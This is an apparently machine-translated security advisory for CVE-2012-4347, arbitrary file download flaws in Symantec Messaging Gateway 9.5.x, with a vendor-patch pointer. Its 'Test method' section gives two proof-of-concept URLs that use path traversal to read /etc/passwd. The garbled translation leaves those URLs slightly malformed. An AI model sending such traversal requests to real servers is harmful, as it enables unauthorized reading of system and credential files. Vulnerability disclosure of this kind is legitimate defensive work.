Symantec Messaging Gateway Arbitrary File Download Vulnerability

Release date:
Updated on: 2012-12-06

Affected Systems:
Symantec Messaging Gateway 9.5.1
Symantec Messaging Gateway 9.5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56789
CVE (CAN) ID: CVE-2012-4347

Symantec Messaging Gateway is Symantec's email virus protection software.

Symantec Messaging Gateway 9.5.x has multiple Arbitrary File Download vulnerabilities. Attackers can exploit these vulnerabilities to download arbitrary files on Web servers.

<* Source: Ben Williams
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Http://www.example.com/brightmail/export? Type = logs & amp; logFile =.../../etc/passwd & amp; logType = 1 & amp; browserType = 1

Http://www.example.com/brightmail/admin/restore/download.do? No-cache = false & amp; displayTab = restore & amp; restoreSource = APPLIANCE & amp; localBackupFileSelection =.../../etc/passwd

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Symantec
--------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.symantec.com/business/security_response/